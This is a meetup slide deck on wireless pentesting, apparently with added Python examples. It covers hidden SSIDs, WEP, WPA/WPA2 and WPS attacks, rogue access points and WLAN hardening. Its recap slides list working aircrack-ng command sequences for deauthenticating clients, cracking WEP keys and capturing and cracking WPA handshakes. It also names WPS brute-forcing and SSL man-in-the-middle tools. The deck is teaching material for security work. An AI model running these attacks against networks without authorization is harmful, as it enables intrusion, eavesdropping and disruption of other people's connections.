pentesting wireless networks and wireless network security

Post on 22-Mar-2017


Ayoma Wijethunga WSO2, Platform Security Team

[ayomawdb]

Pentesting Wireless Networks and

Wireless Network Security

http://www.meetup.com/Colombo-White-Hat-Security/

https://www.facebook.com/colombowhitehat

https://twitter.com/ColomboWhiteHat

Real Agenda

● Hidden SSID [Demo]

● WEP & Relevant Attacks [Demo]

● WPA / WPA2 & Relevant Attacks [Demo]

● WPS Attacks [Demo]

● Securing Personal WLAN

● Securing Enterprise WLAN

● Avoid untrusted wireless networks (why?) [Demo]

● Looking into Future

● What more to expect from White Hat Security

Hidden

Networks?

Hidden SSID / Network Cloaking

“WhiteHat_WiFi” network is available ...(beacon frame)

Beacon Frame - Timestamp, Interval, SSID, Capability, Rates, Parameter Set

http://www.wi-fiplanet.com/tutorials/article.php/1492071/80211-Beacons-Revealed.htm

Beacon frame with NULL SSID

Looking for “WhiteHat_WiFi” (Probe request)

[Figure: "NORMAL" network vs. "CLOAKED" network]
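As an added illustration (not part of the original slides), a small parser for the tagged parameters of an 802.11 beacon body that reports whether the SSID element carries a name or is cloaked; the beacon bodies below are constructed test data, not captured frames.

```python
import struct

# 802.11 beacon frame body: 8-byte timestamp, 2-byte beacon interval,
# 2-byte capability info, then tagged parameters as (tag, length, value).
FIXED_PARAMS_LEN = 12
TAG_SSID = 0x00

def parse_tagged_params(body: bytes) -> list:
    """Split the tagged-parameter section of a beacon body into (tag, value) pairs."""
    pos, elems = FIXED_PARAMS_LEN, []
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + length]
        if len(value) < length:          # truncated frame: stop rather than misparse
            break
        elems.append((tag, value))
        pos += 2 + length
    return elems

def beacon_ssid(body: bytes):
    """Return the advertised SSID, or None when the beacon is cloaked.

    Cloaking shows up either as a zero-length SSID element or, with some
    vendors' firmware, as an SSID of the real length filled with NUL bytes.
    """
    for tag, value in parse_tagged_params(body):
        if tag == TAG_SSID:
            if len(value) == 0 or value.strip(b"\x00") == b"":
                return None
            return value.decode("utf-8", errors="replace")
    return None

def make_beacon_body(ssid: bytes, interval: int = 100) -> bytes:
    """Build a minimal beacon body with constructed fixed fields (test data only)."""
    fixed = struct.pack("<QHH", 0, interval, 0x0411)      # timestamp, interval, capability
    ssid_ie = bytes([TAG_SSID, len(ssid)]) + ssid
    rates_ie = bytes([0x01, 4, 0x82, 0x84, 0x8B, 0x96])   # supported rates 1/2/5.5/11 Mbps
    channel_ie = bytes([0x03, 1, 6])                       # DS parameter set: channel 6
    return fixed + ssid_ie + rates_ie + channel_ie

# Constructed samples: a normal beacon, a cloaked one, and a NUL-padded one.
VISIBLE = make_beacon_body(b"WhiteHat_WiFi")
CLOAKED = make_beacon_body(b"")
NUL_PADDED = make_beacon_body(b"\x00" * 13)

if __name__ == "__main__":
    for name, body in [("visible", VISIBLE), ("cloaked", CLOAKED), ("nul-padded", NUL_PADDED)]:
        print(name, "->", beacon_ssid(body))
```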

Hidden SSID / Network Cloaking

Demo Time

Discovering Hidden SSIDs

Image Source: Spy vs. Spy

airmon-ng - Monitor Mode & Managed Mode

airodump-ng - Dump Traffic

aireplay-ng - Deauth Attack

Recap of Network Cloaking Demo

Enable monitor mode:

sudo airmon-ng start wlan0

Scan all networks:

sudo airodump-ng wlan0mon

Scan specific network:

sudo airodump-ng --bssid <BSSID> -c <Channel> wlan0mon

De-authenticate a client to capture probe request:

sudo aireplay-ng --deauth <Count> -a <AP_MAC> -c <Client_MAC> wlan0mon

Hidden SSID / Network Cloaking

Hey! I’m “WhiteHat_WiFi” with 80% signal strength. (Probe response)

Beacon frame with NULL SSID

Looking for “WhiteHat_WiFi” (Probe request)

Hey! I’m “WhiteHat_WiFi” with 100% signal strength. (Probe response)

Karma attack - http://theta44.org/karma/

WEP

WEP Introduction

64 bit RC4 Key = 40 bit Key + 24 bit Initialization Vector

128 bit RC4 Key = 104 bit Key (13 ASCII characters) + 24 bit Initialization Vector

Authentication exchange: Auth Request → Clear Text Challenge → Enc(K, Clear Text Challenge) → Success

WEP Internals

In WEP Context:

Encryption: M(A) = [ A.CRC32(A) ] ⊕ RC4(v, k)

Decryption: [ A.CRC32(A) ] = M(A) ⊕ RC4(v, k)

Very Basic Idea Behind Stream Cipher Attack:

E(A) = A ⊕ K

E(B) = B ⊕ K

E(A) ⊕ E(B) = (A ⊕ K) ⊕ (B ⊕ K) = A ⊕ B ⊕ K ⊕ K = A ⊕ B

Therefore, need to avoid key reuse.

24 bit IV (v) is too short to avoid collisions.

http://dl.aircrack-ng.org/wiki-files/doc/aircrack_reverse_engineer.pdf
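An added worked example (not from the slides) of the two formulas above: a minimal RC4 and WEP framing with the CRC32 ICV, showing that two frames sent under the same IV XOR down to A ⊕ B, plus the birthday-bound estimate of how quickly a 24-bit IV repeats. The key, IV and frames are constructed sample data.

```python
import zlib
from math import exp

IV_BYTES = 3                       # WEP's 24-bit per-packet IV, sent in the clear
IV_SPACE = 2 ** (8 * IV_BYTES)

def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA) with no initial bytes dropped, as WEP uses it."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_body(data: bytes) -> bytes:
    """A . CRC32(A): the payload followed by its 4-byte ICV (little-endian CRC32)."""
    return data + zlib.crc32(data).to_bytes(4, "little")

def wep_encrypt(iv: bytes, key: bytes, data: bytes) -> bytes:
    """M(A) = [A . CRC32(A)] xor RC4(v, k); RC4 is keyed with iv || key."""
    body = wep_body(data)
    return iv + xor_bytes(body, rc4_keystream(iv + key, len(body)))

def keystream_reuse_xor(frame1: bytes, frame2: bytes):
    """Two frames with the same IV share the RC4 keystream, so the XOR of their
    ciphertexts equals the XOR of their plaintext bodies: E(A) xor E(B) = A xor B."""
    if frame1[:IV_BYTES] != frame2[:IV_BYTES]:
        return None                      # different keystreams: nothing cancels
    return xor_bytes(frame1[IV_BYTES:], frame2[IV_BYTES:])

def iv_collision_probability(n_frames: int) -> float:
    """Birthday bound: P(at least one repeated 24-bit IV among n random IVs)."""
    return 1.0 - exp(-n_frames * (n_frames - 1) / (2.0 * IV_SPACE))

# Constructed sample: a 40-bit key and two frames that reuse IV 0x010203.
KEY = b"\x01\x02\x03\x04\x05"
FRAME_A = wep_encrypt(b"\x01\x02\x03", KEY, b"GET / HTTP/1.0\r\n")
FRAME_B = wep_encrypt(b"\x01\x02\x03", KEY, b"POST / HTTP/1.0\r")
```

With a few thousand frames the collision probability already passes one half, which is why the slide calls the 24-bit IV too short.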

WEP Attacks

Demo Time

WEP Attacks

Image Source: Spy vs. Spy

airmon-ng - Monitor Mode

airodump-ng - Dump Traffic

aireplay-ng - Replay Packets

aircrack-ng - Crack Passwords

Recap of WEP Attacks Demo

Enable monitor mode:

sudo airmon-ng start wlan0

Scan all networks:

sudo airodump-ng wlan0mon

Scan specific network:

sudo airodump-ng --bssid <BSSID> -c <Channel> --write <DumpFileName> wlan0mon

Fake authenticate with hotspot:

sudo aireplay-ng --fakeauth <KA_Delay> -a <AP_MAC> -h <Source_MAC> wlan0mon

ARP Replay: (can use Chopchop / Fragmentation / Caffe Latte as well)

sudo aireplay-ng --arpreplay -b <AP_MAC> -h <Source_MAC> wlan0mon

Crack WEP:

sudo aircrack-ng <DumpFileName>

WEP Attacks

● Methods used by Aircrack-ng

○ PTW Method (Pychkine, Tews, Weinmann) - 35,000 packets to reach 50%

○ FMS/Korek Method

● Methods available via Aireplay-ng

○ FakeAuth Attack and Deauth Attack

○ ArpReplay Attack

○ Chopchop Attack

○ Fragmentation Attack

○ Caffe Latte Attack

References

https://www.aircrack-ng.org/doku.php?id=links#technique_papers

http://www.item.ntnu.no/_media/people/personalpages/phd/anton/kleins_and_ptw_attacks_on_wep.pdf

https://matthieu.io/dl/wifi-attacks-wep-wpa.pdf

https://people.rit.edu/cwh4129/Vulnerabilities_in_WEP_Slides.pdf

WPA / WPA2

What is new with WPA / WPA2?

● WPA / WPA2

○ Rotation of keys

■ New 256 bit key for each packet

○ Larger key size (8 to 63 ASCII characters)

○ Sequence counter to avoid replay attacks

○ Initial handshake required in order to deliver the first group keys

○ Extensible Authentication Protocol (EAP)

○ 64-bit Message Integrity Check (MIC) - Michael

● WPA - TKIP / CCMP (Temporal Key Integrity Protocol)

○ Uses RC4 stream cipher

● WPA2 - AES CCMP (Cipher Block Chaining Message Authentication Code Protocol)

○ Uses AES block encryption

WPA / WPA2 Four-way Handshake

http://www.practicallynetworked.com/security/041207wpa_psk.htm

WPA / WPA2 Attacks

Demo Time

WPA / WPA2 Attacks

Image Source: Spy vs. Spy

airmon-ng - Monitor Mode

airodump-ng - Dump Traffic

aireplay-ng - Replay Packets

aircrack-ng - Crack Passwords

hashcat - GPU Cracking

crunch - Wordlist Generator

Recap of WPA / WPA2 Attacks Demo

Hashcat (GPU) - https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2

Crunch - https://sourceforge.net/projects/crunch-wordlist/

Enable monitor mode:

sudo airmon-ng start wlan0

Scan all networks:

sudo airodump-ng wlan0mon

Scan specific network:

sudo airodump-ng --bssid <BSSID> -c <Channel> --write <DumpFileName> wlan0mon

DeAuth Attack (to capture the four-way handshake):

sudo aireplay-ng --deauth 2 -a <AP_MAC> -c <Client_MAC> wlan0mon

Crack WPA Handshake with Wordlist:

sudo aircrack-ng -w <password_list> <DumpFileName>

Crack WPA Handshake with airolib-ng:

aircrack-ng -r <precomputed_password_db> <DumpFileName>

Security Research with GPUs

5GHs Bitcoin Mining Rig - https://www.youtube.com/watch?v=2nDTBN_cPs0

MegaBigPower https://megabigpower.com/aboutus

Please note that the images do not show GPUs being used for hacking; they illustrate how GPUs are used to speed up cryptographic functions (which can in turn be used in hacking / security research).

WPA / WPA2 Attacks - Practical Difficulties

Cracking cost is exponential to password complexity

Permanent tables cannot be generated since SSID is used as a salt (PBKDF2)

Image : http://brilliancesecuritymagazine.com/by-staff-reporter/active-cyber-defense-or-hacking-back/
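An added example (not from the slides) of the PBKDF2 derivation the slide refers to: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), showing that a table built for one SSID does not transfer to another and measuring the per-candidate cost on the local CPU. The SSIDs and the candidate rate are constructed; the "password" / "IEEE" vector is the one published in IEEE 802.11i.

```python
import hashlib
import time

PBKDF2_ITERATIONS = 4096      # fixed by IEEE 802.11i for WPA/WPA2-Personal
PMK_LEN = 32                  # 256-bit Pairwise Master Key

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32 bytes).

    The SSID is the salt, so a precomputed table only matches one SSID;
    the 4096 iterations are what make each candidate passphrase costly.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)

def table_reusable(ssid_a: str, ssid_b: str, passphrase: str) -> bool:
    """True only if a PMK table built for ssid_a would also match ssid_b."""
    return derive_pmk(passphrase, ssid_a) == derive_pmk(passphrase, ssid_b)

def exhaustive_search_hours(charset_size: int, length: int, pmk_per_second: float) -> float:
    """Hours to try every passphrase of the given charset and length at a PMK rate."""
    return charset_size ** length / pmk_per_second / 3600.0

def measure_pmk_rate(samples: int = 20) -> float:
    """Rough single-core PBKDF2 rate (PMKs per second) on this machine."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"candidate{i:04d}", "WhiteHat_WiFi")   # constructed candidates
    return samples / (time.perf_counter() - start)

if __name__ == "__main__":
    rate = measure_pmk_rate()
    print(f"{rate:.0f} PMK/s on this CPU")
    print("8 lowercase letters:", f"{exhaustive_search_hours(26, 8, rate):.0f} h")
    print("12 mixed characters:", f"{exhaustive_search_hours(94, 12, rate):.2e} h")
```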

WPS

WPS Attacks

Image: http://www.techpanorma.com/wi-fi-protected-setup-wps-how-to-connect-devices-wi-fi-router/

WPS Attacks

Demo Time

WPA / WPA2 Attacks

Image Source: Spy vs. Spy

wash - Looking for WPS enabled networks

reaver - WPS Bruteforcing

Pixie Dust

WPS Attacks - Practical Difficulties

New routers enforce usage counts (WPS lock after X attempts)

Security community / media strongly advise disabling WPS

Image : http://brilliancesecuritymagazine.com/by-staff-reporter/active-cyber-defense-or-hacking-back/

Security

Securing WLAN

● Use WPA2 - AES CCMP (Personal or Enterprise mode).

● Disable WPS.

● Test if your router really disables WPS.

● Use lengthy and complex WiFi passwords (symbols/numbers/caps).

● Use a unique SSID (change the default).

● Make sure router admin panel is protected with a different password.

● Use guest accounts for “guests”.

● Avoid dictionary words in passwords.

Securing Enterprise WLAN

● Use WPA2 - AES CCMP (Enterprise mode).

● Disable WPS.

● Test if your router really disables WPS.

● Use guest accounts for “guests”.

● Maintain separate network segments for different purposes

○ Internal connections / General connections / Guest connections / BYOD connections

● RADIUS server for authentication.

● Per-user sessions and per-session random key.

● MAC validation (can be spoofed).

CloudCracker (Dead)

604 million-word dictionary - $17

1.2 billion-word dictionary - $34

GPU based cracking as a SaaS?

Backdoor in AES?

https://www.schneier.com/blog/archives/2012/03/can_the_nsa_bre.html

Looking into Future

Image : http://www.keyword-suggestions.com/c3BlZWQgaWNvbg/

Avoid untrusted wireless networks (why?)

Demo Time

AP Gone Bad

OpenWRT - Create FREE WiFi Hotspot

SSLSplit - Split SSL connections & perform MitM

Image Source: Spy vs. Spy

What more to expect from White Hat Security about Wireless Security

Bluetooth (BLE) Security

Ultra-portable Wireless Security Recipes with ESP8266

RF

BE WITHIN LEGAL LIMITS

Only test your own networks, or test with proper authorization.

Thank you!